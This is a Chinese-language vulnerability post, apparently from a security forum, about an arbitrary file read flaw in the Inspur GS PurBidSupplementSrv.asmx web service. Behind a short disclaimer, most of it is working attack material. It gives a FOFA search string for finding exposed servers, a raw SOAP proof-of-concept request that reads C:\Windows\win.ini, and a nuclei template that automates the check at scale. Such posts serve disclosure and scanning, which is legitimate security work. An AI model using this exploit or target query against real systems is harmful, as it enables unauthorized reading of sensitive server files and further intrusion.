免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
浪潮GS PurBidSupplementSrv.asmx 存在任意文件读取漏洞。攻击者可以利用该漏洞,通过特定的请求,读取服务器上的任意文件。这可能导致敏感信息泄露,进一步威胁系统的安全性
影响版本:
浪潮GS
FOFA:
"cwbase/web/scripts/aes.js"POC:
POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: GSPWebLanguageKey=zh-CN
Upgrade-Insecure-Requests: 1
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body xmlns:m="http://tempuri.org/">
<m:downLoadFile>
<m:filePath>C:\\Windows\\win.ini</m:filePath>
<m:offset>0</m:offset>
</m:downLoadFile>
</soap:Body>
</soap:Envelope>查看返回内容是否是windows的win.ini文件内容
nuclei模板
id: inspur-gs-purbidsupplementsrv-file-read
info:
name: Inspur GS PurBidSupplementSrv Arbitrary File Read
author: ProjectDiscoveryAI
severity: high
description: |
This template checks for an arbitrary file read vulnerability in Inspur GS PurBidSupplementSrv.
It sends a SOAP request to read the 'C:\\Windows\\win.ini' file.
tags: inspur, file-read, soap, xml
http:
- raw:
- |
POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: GSPWebLanguageKey=zh-CN
Upgrade-Insecure-Requests: 1
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body xmlns:m="http://tempuri.org/">
<m:downLoadFile>
<m:filePath>C:\\Windows\\win.ini</m:filePath>
<m:offset>0</m:offset>
</m:downLoadFile>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[extensions]"
- "[mci extensions]"
- type: word
part: header
words:
- "text/xml"
没有回复内容